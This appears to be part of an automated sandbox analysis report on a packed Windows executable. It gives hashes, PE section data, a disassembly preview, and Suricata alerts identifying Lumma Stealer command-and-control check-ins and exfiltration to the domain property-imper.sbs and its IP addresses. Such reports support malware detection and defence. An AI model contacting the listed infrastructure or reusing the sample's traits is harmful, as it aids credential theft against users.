                                                                                            Created / dropped Files

                                                                                            No created / dropped files found

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.9482200931332
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:file.exe
                                                                                            File size:1'872'384 bytes
                                                                                            MD5:6f817d33d580eb1b17c7159cd9e48c6e
                                                                                            SHA1:71bbb2928b40734b668e2c834f7b99f77400c8cf
                                                                                            SHA256:89bdff74d8814a4bf1441de3727d2cc526aa12574aea8bf45cc0441e3b6dd6d8
                                                                                            SHA512:688ec59c4eeb6d6945621aef2c4bd8a46c966b91b739099fe88c495129d18ca7a3587852a9ceb0e25955d50a6eaca3b690a04fd57e73ad23337b1adcb1ba97fb
                                                                                            SSDEEP:49152:CK3QaIzwp4zkEQhTMpcqkZhd4Cc6VOpWYqTLq0:CDP1Qt6cDkUOphqHq0
                                                                                            TLSH:D78533B34CA5BAB6C08705FEE5873B131AF8341817976B5987E0A57C0B3F6C875109AB
                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................0J...........@..........................`J.....).....@.................................\...p..

                                                                                            File Icon

                                                                                            Icon Hash:00928e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x8a3000
                                                                                            Entrypoint Section:.taggant
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp 00007FAC2D24471Ah
                                                                                            pshufw mm3, qword ptr [eax+eax], 00h
                                                                                            add byte ptr [eax], al
                                                                                            add cl, ch
                                                                                            add byte ptr [eax], ah
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            0x10000x560000x262000cf64ec71775ec8f529e2233c909e4e7False0.9992955942622951data7.983036802389504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x570000x2b00x200fe598a778e75afc35e862474c2009dccFalse0.796875data6.025080360685554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            0x590000x2a90000x20051db6cf4aa19df9cc5833b17a7275806unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            hvjfzrca0x3020000x1a00000x19f400f8fa66d771e811e33111f9eb2401cb0aFalse0.9943516941977725data7.95343629195046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            thpuhcpo0x4a20000x10000x400cf4d8cfa66d28fa28d381d71ef236f3dFalse0.7861328125data6.137523983539164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .taggant0x4a30000x30000x2200913da226bd10efc24c1071bd411a7648False0.08754595588235294DOS executable (COM)1.0421631739018067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_MANIFEST0x4a10040x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                            Imports

                                                                                            DLLImport
                                                                                            kernel32.dlllstrcpy

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-24T12:49:12.963924+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707172.67.162.84443TCP
                                                                                            2024-11-24T12:49:13.663234+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707172.67.162.84443TCP
                                                                                            2024-11-24T12:49:13.663234+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707172.67.162.84443TCP
                                                                                            2024-11-24T12:49:14.967469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709172.67.162.84443TCP
                                                                                            2024-11-24T12:49:15.693662+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649709172.67.162.84443TCP
                                                                                            2024-11-24T12:49:15.693662+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709172.67.162.84443TCP
                                                                                            2024-11-24T12:49:17.245766+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710172.67.162.84443TCP
                                                                                            2024-11-24T12:49:18.145619+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649710172.67.162.84443TCP
                                                                                            2024-11-24T12:49:19.487959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.67.162.84443TCP
                                                                                            2024-11-24T12:49:21.847284+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718172.67.162.84443TCP
                                                                                            2024-11-24T12:49:24.528574+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724172.67.162.84443TCP
                                                                                            2024-11-24T12:49:27.028571+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649733172.67.162.84443TCP
                                                                                            2024-11-24T12:49:31.156529+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649749172.67.162.84443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 24, 2024 12:49:11.678107977 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:11.678148031 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:11.678232908 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:11.681221962 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:11.681236029 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:12.963852882 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:12.963923931 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:12.968246937 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:12.968260050 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:12.968683004 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.015712976 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.031781912 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.031801939 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.032061100 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.663244963 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.663343906 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.663583994 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.666624069 CET49707443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.666644096 CET44349707172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.747370005 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.747422934 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:13.747667074 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.747975111 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:13.747989893 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:14.967396021 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:14.967468977 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:14.969060898 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:14.969074965 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:14.969310045 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:14.970874071 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:14.970906019 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:14.970956087 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693669081 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693734884 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693763018 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693809986 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693824053 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.693840027 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.693866014 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.702567101 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.702604055 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.702636957 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.702646971 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.702698946 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.711092949 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.765687943 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.765705109 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.812659979 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.815021992 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.859447002 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.889225006 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.893049955 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.893099070 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.893112898 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.893147945 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.893199921 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.893343925 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.893362999 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.893376112 CET49709443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.893383026 CET44349709172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.978122950 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.978146076 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:15.978243113 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.978550911 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:15.978564978 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:17.245599031 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:17.245765924 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:17.247829914 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:17.247839928 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:17.248111963 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:17.249633074 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:17.249800920 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:17.249836922 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:18.145631075 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:18.145729065 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:18.145785093 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:18.146030903 CET49710443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:18.146049023 CET44349710172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:18.260266066 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:18.260322094 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:18.260442019 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:18.260941982 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:18.260962009 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:19.487710953 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:19.487958908 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:19.489794016 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:19.489804029 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:19.490048885 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:19.491566896 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:19.491743088 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:19.491775036 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:19.491827965 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:19.535339117 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:20.371383905 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:20.371505022 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:20.371627092 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:20.371948957 CET49712443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:20.371967077 CET44349712172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:20.558636904 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:20.558671951 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:20.558799982 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:20.559102058 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:20.559118986 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:21.847187996 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:21.847284079 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:21.849301100 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:21.849313974 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:21.849646091 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:21.851188898 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:21.851340055 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:21.851375103 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:21.851437092 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:21.851448059 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:22.732785940 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:22.732925892 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:22.732992887 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:22.733136892 CET49718443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:22.733155012 CET44349718172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:23.259404898 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:23.259493113 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:23.259578943 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:23.259927988 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:23.259964943 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:24.528439999 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:24.528573990 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:24.529993057 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:24.530009985 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:24.530253887 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:24.531802893 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:24.531894922 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:24.531908989 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:25.233967066 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:25.234074116 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:25.234142065 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:25.234245062 CET49724443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:25.234273911 CET44349724172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:25.756985903 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:25.757106066 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:25.757198095 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:25.757539034 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:25.757575035 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.028481960 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.028570890 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.030186892 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.030205965 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.030453920 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.063426971 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.064367056 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.064414024 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.064541101 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.064579010 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.064730883 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.064918995 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.065174103 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.065211058 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.065680981 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.065716982 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.065970898 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066009998 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066030979 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066059113 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066297054 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066334963 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066376925 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066396952 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066483974 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066514015 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066561937 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066584110 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066662073 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066693068 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066747904 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066787004 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:27.066809893 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:27.066826105 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:30.877640009 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:30.877718925 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:30.877789021 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:30.879586935 CET49733443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:30.879617929 CET44349733172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:30.909470081 CET49749443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:30.909492970 CET44349749172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:30.909589052 CET49749443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:30.909945011 CET49749443192.168.2.6172.67.162.84
                                                                                            Nov 24, 2024 12:49:30.909966946 CET44349749172.67.162.84192.168.2.6
                                                                                            Nov 24, 2024 12:49:31.156528950 CET49749443192.168.2.6172.67.162.84

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 24, 2024 12:49:11.200397015 CET6539253192.168.2.61.1.1.1
                                                                                            Nov 24, 2024 12:49:11.667258024 CET53653921.1.1.1192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 24, 2024 12:49:11.200397015 CET192.168.2.61.1.1.10xd632Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 24, 2024 12:49:11.667258024 CET1.1.1.1192.168.2.60xd632No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                            Nov 24, 2024 12:49:11.667258024 CET1.1.1.1192.168.2.60xd632No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • property-imper.sbs

                                                                                            HTTPS Proxied Packets

